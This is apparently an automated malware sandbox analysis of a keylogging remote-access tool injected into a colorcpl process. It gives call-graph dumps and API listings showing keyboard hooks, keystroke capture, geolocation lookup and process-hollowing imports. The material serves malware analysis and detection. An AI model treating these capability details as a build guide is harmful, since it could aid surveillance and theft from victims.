48013 2fa35e1 RegOpenKeyExA 48011->48013 48012->48011 48014 2fa360f RegQueryValueExA RegCloseKey 48013->48014 48015 2fa3639 48013->48015 48014->48015 48016 2f92093 28 API calls 48015->48016 48017 2fa364e 48016->48017 48017->47535 48018->47544 48020 2f9b947 48019->48020 48025 2f92252 48020->48025 48022 2f9b952 48029 2f9b967 48022->48029 48024 2f9b961 48024->47554 48026 2f922ac 48025->48026 48027 2f9225c 48025->48027 48026->48022 48027->48026 48036 2f92779 11 API calls std::_Deallocate 48027->48036 48030 2f9b9a1 48029->48030 48031 2f9b973 48029->48031 48048 2f928a4 22 API calls 48030->48048 48037 2f927e6 48031->48037 48035 2f9b97d 48035->48024 48036->48026 48038 2f927ef 48037->48038 48039 2f927f9 48038->48039 48040 2f92851 48038->48040 48043 2f92802 48039->48043 48045 2f92815 48039->48045 48050 2f928a4 22 API calls 48040->48050 48049 2f92aea 28 API calls __EH_prolog 48043->48049 48046 2f92813 48045->48046 48047 2f92252 11 API calls 48045->48047 48046->48035 48047->48046 48049->48046 48051->47563 48053 2f92347 48052->48053 48054 2f92252 11 API calls 48053->48054 48055 2f923c7 48054->48055 48055->47563 48057 2f924f9 48056->48057 48058 2f9250a 28 API calls 48057->48058 48059 2f920b1 48058->48059 48059->47183 48076 2fcba8a 48060->48076 48062 2fcaed0 48063 2fca837 __cftof 35 API calls 48062->48063 48069 2fcaedc 48063->48069 48064 2fcaeaa 48081 2fd062d 20 API calls __dosmaperr 48064->48081 48065 2fcae95 48065->48062 48065->48064 48067 2fcaeaf __cftof 48065->48067 48067->47592 48070 2fcaf0b 48069->48070 48082 2fcbacf 39 API calls __Toupper 48069->48082 48073 2fcaf77 48070->48073 48083 2fcba36 20 API calls 2 library calls 48070->48083 48084 2fcba36 20 API calls 2 library calls 48073->48084 48074 2fcb03e _swprintf 48074->48067 48085 2fd062d 20 API calls __dosmaperr 48074->48085 48077 2fcba8f 48076->48077 48078 2fcbaa2 48076->48078 48086 2fd062d 20 API calls __dosmaperr 48077->48086 48078->48065 48080 2fcba94 __cftof 48080->48065 48081->48067 48082->48069 48083->48073 
48084->48074 48085->48067 48086->48080 48093 2f91fb0 48087->48093 48089 2f92f1e 48090 2f92055 11 API calls 48089->48090 48091 2f92f2d 48090->48091 48091->47606 48092->47609 48094 2f925f0 28 API calls 48093->48094 48095 2f91fbd 48094->48095 48095->48089 48097 2f9a162 48096->48097 48098 2fa3584 3 API calls 48097->48098 48099 2f9a169 48098->48099 48100 2f9a17d 48099->48100 48101 2f9a197 48099->48101 48103 2f99ed6 48100->48103 48104 2f9a182 48100->48104 48117 2f99097 48101->48117 48103->47234 48106 2f99097 28 API calls 48104->48106 48107 2f9a190 48106->48107 48145 2f9a268 29 API calls 48107->48145 48110 2f9a195 48110->48103 48111->47633 48293 2f93222 48112->48293 48114 2f93022 48297 2f93262 48114->48297 48118 2f990ad 48117->48118 48119 2f92252 11 API calls 48118->48119 48120 2f990c7 48119->48120 48146 2f94267 48120->48146 48122 2f990d5 48123 2f9a1b4 48122->48123 48158 2f9b927 48123->48158 48126 2f9a1dd 48129 2f92093 28 API calls 48126->48129 48127 2f9a205 48128 2f92093 28 API calls 48127->48128 48130 2f9a210 48128->48130 48131 2f9a1e7 48129->48131 48132 2f92093 28 API calls 48130->48132 48133 2fabcef 28 API calls 48131->48133 48135 2f9a21f 48132->48135 48134 2f9a1f5 48133->48134 48162 2f9b19f 31 API calls _Yarn 48134->48162 48137 2fab580 79 API calls 48135->48137 48139 2f9a224 CreateThread 48137->48139 48138 2f9a1fc 48140 2f91fd8 11 API calls 48138->48140 48141 2f9a24b CreateThread 48139->48141 48142 2f9a23f CreateThread 48139->48142 48170 2f9a2b8 48139->48170 48140->48127 48143 2f91f09 11 API calls 48141->48143 48167 2f9a2c4 48141->48167 48142->48141 48164 2f9a2a2 48142->48164 48144 2f9a25f 48143->48144 48144->48103 48145->48110 48292 2f9a2ae 162 API calls 48145->48292 48147 2f92888 22 API calls 48146->48147 48148 2f9427b 48147->48148 48149 2f94290 48148->48149 48150 2f942a5 48148->48150 48156 2f942df 22 API calls 48149->48156 48152 2f927e6 28 API calls 48150->48152 48154 2f942a3 48152->48154 48153 2f94299 48157 2f92c48 22 API calls 48153->48157 48154->48122 
48156->48153 48157->48154 48159 2f9a1d2 48158->48159 48160 2f9b930 48158->48160 48159->48126 48159->48127 48163 2f9b9a7 28 API calls 48160->48163 48162->48138 48163->48159 48173 2f9a2f3 48164->48173 48203 2f9ad11 48167->48203 48245 2f9a761 48170->48245 48174 2f9a30c GetModuleHandleA SetWindowsHookExA 48173->48174 48175 2f9a36e GetMessageA 48173->48175 48174->48175 48177 2f9a328 GetLastError 48174->48177 48176 2f9a380 TranslateMessage DispatchMessageA 48175->48176 48187 2f9a2ab 48175->48187 48176->48175 48176->48187 48188 2fabc1f 48177->48188 48194 2fd1ed1 48188->48194 48191 2f92093 28 API calls 48192 2f9a339 48191->48192 48193 2f952fd 28 API calls 48192->48193 48195 2fd1edd 48194->48195 48198 2fd1ccd 48195->48198 48197 2fabc43 48197->48191 48199 2fd1ce4 48198->48199 48201 2fd1d1b __cftof 48199->48201 48202 2fd062d 20 API calls __dosmaperr 48199->48202 48201->48197 48202->48201 48210 2f9ad1f 48203->48210 48204 2f9a2cd 48205 2f9ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48207 2f9b93f 28 API calls 48205->48207 48207->48210 48210->48204 48210->48205 48212 2fabb77 GetTickCount 48210->48212 48213 2f9adbf GetWindowTextW 48210->48213 48215 2f9b927 28 API calls 48210->48215 48216 2f9af17 48210->48216 48218 2f9ae84 Sleep 48210->48218 48219 2fd1ed1 20 API calls 48210->48219 48221 2f92093 28 API calls 48210->48221 48225 2f93014 28 API calls 48210->48225 48226 2f96383 28 API calls 48210->48226 48228 2f9ae0c 48210->48228 48229 2fabcef 28 API calls 48210->48229 48230 2f91f09 11 API calls 48210->48230 48231 2f9a671 29 API calls 48210->48231 48232 2f91fd8 11 API calls 48210->48232 48233 2fc445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 48210->48233 48234 2f91f86 48210->48234 48238 2fc4801 23 API calls __onexit 48210->48238 48239 2fc441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 48210->48239 48240 2f9907f 28 API calls 48210->48240 48242 2f9b9b7 28 API calls 48210->48242 48243 2f9b783 40 API 
calls 2 library calls 48210->48243 48244 2f952fd 28 API calls 48210->48244 48212->48210 48213->48210 48215->48210 48217 2f91f09 11 API calls 48216->48217 48217->48204 48218->48210 48219->48210 48221->48210 48224 2f99097 28 API calls 48224->48228 48225->48210 48226->48210 48228->48210 48228->48224 48241 2f9b19f 31 API calls _Yarn 48228->48241 48229->48210 48230->48210 48231->48210 48232->48210 48235 2f91f8e 48234->48235 48236 2f92252 11 API calls 48235->48236 48237 2f91f99 48236->48237 48237->48210 48238->48210 48239->48210 48240->48210 48241->48228 48242->48210 48243->48210 48246 2f9a776 Sleep 48245->48246 48266 2f9a6b0 48246->48266 48248 2f9a2c1 48249 2f9a7b6 CreateDirectoryW 48253 2f9a788 48249->48253 48250 2f9a7c7 GetFileAttributesW 48250->48253 48251 2f9a7de SetFileAttributesW 48251->48253 48252 2f9a829 48254 2f920df 11 API calls 48252->48254 48256 2f9a858 PathFileExistsW 48252->48256 48258 2f920b7 28 API calls 48252->48258 48260 2f9a961 SetFileAttributesW 48252->48260 48261 2f91fe2 28 API calls 48252->48261 48262 2f96e13 28 API calls 48252->48262 48263 2f91fd8 11 API calls 48252->48263 48265 2f91fd8 11 API calls 48252->48265 48289 2fac516 32 API calls 48252->48289 48290 2fac583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48252->48290 48253->48246 48253->48248 48253->48249 48253->48250 48253->48251 48253->48252 48257 2f91e65 22 API calls 48253->48257 48279 2fac482 48253->48279 48254->48252 48256->48252 48257->48253 48258->48252 48260->48253 48261->48252 48262->48252 48263->48252 48265->48253 48267 2f9a75d 48266->48267 48269 2f9a6c6 48266->48269 48267->48253 48268 2f9a6e5 CreateFileW 48268->48269 48270 2f9a6f3 GetFileSize 48268->48270 48269->48268 48271 2f9a728 CloseHandle 48269->48271 48272 2f9a73a 48269->48272 48273 2f9a71d Sleep 48269->48273 48274 2f9a716 48269->48274 48270->48269 48270->48271 48271->48269 48272->48267 48276 2f99097 28 API calls 48272->48276 48273->48271 48291 2f9b117 83 API calls 48274->48291 48277 2f9a756 48276->48277 48278 
2f9a1b4 123 API calls 48277->48278 48278->48267 48280 2fac495 CreateFileW 48279->48280 48282 2fac4ce 48280->48282 48283 2fac4d2 48280->48283 48282->48253 48284 2fac4d9 SetFilePointer 48283->48284 48285 2fac4f2 WriteFile 48283->48285 48284->48285 48288 2fac4e9 CloseHandle 48284->48288 48286 2fac507 CloseHandle 48285->48286 48287 2fac505 48285->48287 48286->48282 48287->48286 48288->48282 48289->48252 48290->48252 48291->48273 48294 2f9322e 48293->48294 48303 2f93618 48294->48303 48296 2f9323b 48296->48114 48298 2f9326e 48297->48298 48299 2f92252 11 API calls 48298->48299 48300 2f93288 48299->48300 48301 2f92336 11 API calls 48300->48301 48302 2f93031 48301->48302 48302->47638 48304 2f93626 48303->48304 48305 2f93644 48304->48305 48306 2f9362c 48304->48306 48308 2f9365c 48305->48308 48309 2f9369e 48305->48309 48314 2f936a6 28 API calls 48306->48314 48311 2f927e6 28 API calls 48308->48311 48313 2f93642 48308->48313 48315 2f928a4 22 API calls 48309->48315 48311->48313 48313->48296 48314->48313 48317 2f94186 48316->48317 48318 2f92252 11 API calls 48317->48318 48319 2f94191 48318->48319 48327 2f941bc 48319->48327 48322 2f942fc 48338 2f94353 48322->48338 48324 2f9430a 48325 2f93262 11 API calls 48324->48325 48326 2f94319 48325->48326 48326->47647 48328 2f941c8 48327->48328 48331 2f941d9 48328->48331 48330 2f9419c 48330->48322 48332 2f941e9 48331->48332 48333 2f941ef 48332->48333 48334 2f94206 48332->48334 48336 2f94267 28 API calls 48333->48336 48335 2f927e6 28 API calls 48334->48335 48337 2f94204 48335->48337 48336->48337 48337->48330 48339 2f9435f 48338->48339 48342 2f94371 48339->48342 48341 2f9436d 48341->48324 48343 2f9437f 48342->48343 48344 2f9439e 48343->48344 48345 2f94385 48343->48345 48346 2f92888 22 API calls 48344->48346 48408 2f934e6 28 API calls 48345->48408 48347 2f943a6 48346->48347 48349 2f94419 48347->48349 48350 2f943bf 48347->48350 48409 2f928a4 22 API calls 48349->48409 48352 2f927e6 28 API calls 48350->48352 48361 2f9439c 48350->48361 48352->48361 
48361->48341 48408->48361 48416 2fcab1a 48410->48416 48414 2fa38ca RegSetValueExA RegCloseKey 48413->48414 48415 2fa38f4 48413->48415 48414->48415 48415->47666 48419 2fcaa9b 48416->48419 48418 2f9170d 48418->47664 48420 2fcaabe 48419->48420 48421 2fcaaaa 48419->48421 48424 2fcaaaf __alldvrm __cftof 48420->48424 48426 2fd89d7 11 API calls 2 library calls 48420->48426 48425 2fd062d 20 API calls __dosmaperr 48421->48425 48424->48418 48425->48424 48426->48424 48430 2fab98a _Yarn ___scrt_get_show_window_mode 48427->48430 48428 2f92093 28 API calls 48429 2fa4f84 48428->48429 48429->47672 48430->48428 48431->47689 48433 2fa4f3d getaddrinfo WSASetLastError 48432->48433 48434 2fa4f33 48432->48434 48433->47739 48574 2fa4dc1 29 API calls ___std_exception_copy 48434->48574 48436 2fa4f38 48436->48433 48438 2f94839 48437->48438 48439 2f94846 socket 48437->48439 48575 2f9489e WSAStartup 48438->48575 48441 2f94860 CreateEventW 48439->48441 48442 2f94842 48439->48442 48441->47739 48442->47739 48443 2f9483e 48443->48439 48443->48442 48445 2f94fea 48444->48445 48446 2f94f65 48444->48446 48445->47739 48447 2f94f6e 48446->48447 48448 2f94fc0 CreateEventA CreateThread 48446->48448 48449 2f94f7d GetLocalTime 48446->48449 48447->48448 48448->48445 48577 2f95150 48448->48577 48450 2fabc1f 28 API calls 48449->48450 48451 2f94f91 48450->48451 48576 2f952fd 28 API calls 48451->48576 48460 2f94a1b 48459->48460 48461 2f948ee 48459->48461 48462 2f9497e 48460->48462 48463 2f94a21 WSAGetLastError 48460->48463 48461->48462 48464 2f94923 48461->48464 48469 2f9531e 28 API calls 48461->48469 48462->47739 48463->48462 48465 2f94a31 48463->48465 48581 2fb0cf1 27 API calls 48464->48581 48466 2f94932 48465->48466 48467 2f94a36 48465->48467 48476 2f92093 28 API calls 48466->48476 48586 2facb72 30 API calls 48467->48586 48472 2f9490f 48469->48472 48471 2f9492b 48471->48466 48475 2f94941 48471->48475 48473 2f92093 28 API calls 48472->48473 48477 2f9491e 48473->48477 48474 2f94a40 48587 2f952fd 28 API calls 
                                                          Control-flow graph edge data (rendering residue; only node addresses and the API calls on the graph nodes are recoverable): CreateEventW, GlobalMemoryStatusEx, GetTickCount, GetForegroundWindow/GetWindowTextW, CreateEventA/CreateThread/WaitForSingleObject/CloseHandle, SetEvent, Sleep, TerminateProcess/WaitForSingleObject, ExitProcess, RtlReAllocateHeap, CallNextHookEx, ToUnicodeEx, recv, send, InternetOpenW/InternetOpenUrlW/InternetReadFile/InternetCloseHandle, DeleteCriticalSection/EnterCriticalSection/LeaveCriticalSection.

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02F9A30E
                                                          • SetWindowsHookExA.USER32(0000000D,02F9A2DF,00000000), ref: 02F9A31C
                                                          • GetLastError.KERNEL32 ref: 02F9A328
                                                            • Part of subcall function 02FAB580: GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02F9A376
                                                          • TranslateMessage.USER32(?), ref: 02F9A385
                                                          • DispatchMessageA.USER32(?), ref: 02F9A390
                                                          Strings
                                                          • Keylogger initialization failure: error , xrefs: 02F9A33C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                          • String ID: Keylogger initialization failure: error
                                                          • API String ID: 3219506041-952744263
                                                          • Opcode ID: 80535452c1b1b83e96053b015c31c6dc6ec5aac1282d2b6ce935975081bff277
                                                          • Instruction ID: 3f2b8f8b46199f7dff39a02ab420299279a95e3420f4e23e45629e9c2206ad79
                                                          • Opcode Fuzzy Hash: 80535452c1b1b83e96053b015c31c6dc6ec5aac1282d2b6ce935975081bff277
                                                          • Instruction Fuzzy Hash: 7011C172E50205AFAF117B759C09C6BB7ECEB85694B50092DFA82C2180EB71C504CBB2

                                                          Control-flow Graph

                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,030050F0), ref: 02F9A451
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 02F9A45D
                                                          • GetKeyboardLayout.USER32(00000000), ref: 02F9A464
                                                          • GetKeyState.USER32(00000010), ref: 02F9A46E
                                                          • GetKeyboardState.USER32(?,?,030050F0), ref: 02F9A479
                                                          • ToUnicodeEx.USER32(03005144,?,?,?,00000010,00000000,00000000), ref: 02F9A49C
                                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02F9A4FC
                                                          • ToUnicodeEx.USER32(03005144,?,?,?,00000010,00000000,00000000), ref: 02F9A535
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                          • String ID:
                                                          • API String ID: 1888522110-0
                                                          • Opcode ID: b3d92a55ab5e45a56f574ed9190910e7991d9c3925c272f580d17cb99800e5d7
                                                          • Instruction ID: 7a67dd8d569dab3199d1c82bcd7320cc76ebbbe5c3ee444f704dda61f25912a6
                                                          • Opcode Fuzzy Hash: b3d92a55ab5e45a56f574ed9190910e7991d9c3925c272f580d17cb99800e5d7
                                                          • Instruction Fuzzy Hash: F1316272644308BFEB11DB94DC44FDBB7EDEB88784F00082AB245D71A0D7B1A558CBA2

                                                          Control-flow Graph

                                                          APIs
                                                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02FAB438
                                                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 02FAB44E
                                                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 02FAB467
                                                          • InternetCloseHandle.WININET(00000000), ref: 02FAB4AD
                                                          • InternetCloseHandle.WININET(00000000), ref: 02FAB4B0
                                                          Strings
                                                          • http://geoplugin.net/json.gp, xrefs: 02FAB448
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseHandleOpen$FileRead
                                                          • String ID: http://geoplugin.net/json.gp
                                                          • API String ID: 3121278467-91888290
                                                          • Opcode ID: b96b77a9affc26fc54280e422ef28578bdef64657d97342e9b85e83a1967c399
                                                          • Instruction ID: fd91b77aff4867af3116bca220561e9ba0c617ab1d26b6f89eb91159ad3c1bec
                                                          • Opcode Fuzzy Hash: b96b77a9affc26fc54280e422ef28578bdef64657d97342e9b85e83a1967c399
                                                          • Instruction Fuzzy Hash: 3C11C4715053267BEB24EE25DD48EAF7F9DEF956E4F10082DFA0692140DB649808CAB2

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 02FA3584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 02FA35A4
                                                            • Part of subcall function 02FA3584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,030052F0), ref: 02FA35C2
                                                            • Part of subcall function 02FA3584: RegCloseKey.KERNEL32(?), ref: 02FA35CD
                                                          • Sleep.KERNEL32(00000BB8), ref: 02F9F896
                                                          • ExitProcess.KERNEL32 ref: 02F9F905
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                          • String ID: 5.1.3 Pro$override$pth_unenc
                                                          • API String ID: 2281282204-1392497409
                                                          • Opcode ID: 42f3042ca6aacf45b52cc8ae5d60ffd853769688ea78b4c41cd78b10cd299ee6
                                                          • Instruction ID: 67defdf147465d4647ea8697748658246b2b852f5c6bfa34d761ffc71f027992
                                                          • Opcode Fuzzy Hash: 42f3042ca6aacf45b52cc8ae5d60ffd853769688ea78b4c41cd78b10cd299ee6
                                                          • Instruction Fuzzy Hash: 4C21C771F1420567FE48B6788C65A2EB6AB5F81BD0F50052CF70A97294FE65C9018FA3
                                                          APIs
                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,02FC3550,00000034,?,?,0074F630), ref: 02FC38DA
                                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,02FC35E3,00000000,?,00000000), ref: 02FC38F0
                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,02FC35E3,00000000,?,00000000,02FAE2E2), ref: 02FC3902
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                          • String ID:
                                                          • API String ID: 1815803762-0
                                                          • Opcode ID: cd2b381aa316762d20bfcb55bb7b36a558392bb2f94040eca43478c31e3f63dc
                                                          • Instruction ID: 23e4f0c5d6ca22e463d050499bf7d3db9bf3bb04c6d2ee4307c29dec08b0ec86
                                                          • Opcode Fuzzy Hash: cd2b381aa316762d20bfcb55bb7b36a558392bb2f94040eca43478c31e3f63dc
                                                          • Instruction Fuzzy Hash: E2E0923674C212FBEF310E21AD08F567A66EB85BE0F304D7DF315E80D8D6A28810C664
                                                          APIs
                                                          • GetComputerNameExW.KERNEL32(00000001,?,0000002B,030050E4), ref: 02FAB6BB
                                                          • GetUserNameW.ADVAPI32(?,02F9F25E), ref: 02FAB6D3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Name$ComputerUser
                                                          • String ID:
                                                          • API String ID: 4229901323-0
                                                          • Opcode ID: 6a90a756b7d884b928642e2b3b8c1c917d53792d477e1b21d91857244cf03d8c
                                                          • Instruction ID: c22952a844d2b08e9698d8503f478699d8b6726bbc48c3c8f505cfb0dd83bd68
                                                          • Opcode Fuzzy Hash: 6a90a756b7d884b928642e2b3b8c1c917d53792d477e1b21d91857244cf03d8c
                                                          • Instruction Fuzzy Hash: CB014F7190011CABEF01EBD0DC44ADEB7BDAF04305F100166E605A2160EEB06A89CFA4
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,02FA5537,03004EE0,03005A00,03004EE0,00000000,03004EE0,00000000,03004EE0,5.1.3 Pro), ref: 02F9F920
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: ceac518a461cdd95eed946e53ccf2df37c2e4d71c881a05d82cb6a9bfb2de18d
                                                          • Instruction ID: 00609bfb0042c934ba1418916e0ac27216a166f0842078538f17561c817795dd
                                                          • Opcode Fuzzy Hash: ceac518a461cdd95eed946e53ccf2df37c2e4d71c881a05d82cb6a9bfb2de18d
                                                          • Instruction Fuzzy Hash: 1ED05B30B4411C77EA1096959C0AEAA779CD701B61F000195BF05D72C0D9E15E008BE1

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02F9EA1C), ref: 02FACBF6
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACBFF
                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02F9EA1C), ref: 02FACC16
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC19
                                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02F9EA1C), ref: 02FACC2B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC2E
                                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02F9EA1C), ref: 02FACC3F
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC42
                                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02F9EA1C), ref: 02FACC54
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC57
                                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02F9EA1C), ref: 02FACC63
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC66
                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02F9EA1C), ref: 02FACC77
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC7A
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02F9EA1C), ref: 02FACC8B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACC8E
                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02F9EA1C), ref: 02FACC9F
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACCA2
                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02F9EA1C), ref: 02FACCB3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACCB6
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02F9EA1C), ref: 02FACCC7
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACCCA
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02F9EA1C), ref: 02FACCDB
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACCDE
                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02F9EA1C), ref: 02FACCEF
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACCF2
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02F9EA1C), ref: 02FACD03
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD06
                                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02F9EA1C), ref: 02FACD14
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD17
                                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,02F9EA1C), ref: 02FACD28
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD2B
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,02F9EA1C), ref: 02FACD38
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD3B
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,02F9EA1C), ref: 02FACD48
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD4B
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,02F9EA1C), ref: 02FACD5D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD60
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,02F9EA1C), ref: 02FACD6D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD70
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,02F9EA1C), ref: 02FACD81
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD84
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,02F9EA1C), ref: 02FACD95
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACD98
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,02F9EA1C), ref: 02FACDAA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACDAD
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,02F9EA1C), ref: 02FACDBA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACDBD
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,02F9EA1C), ref: 02FACDCA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACDCD
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,02F9EA1C), ref: 02FACDDA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FACDDD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad$HandleModule
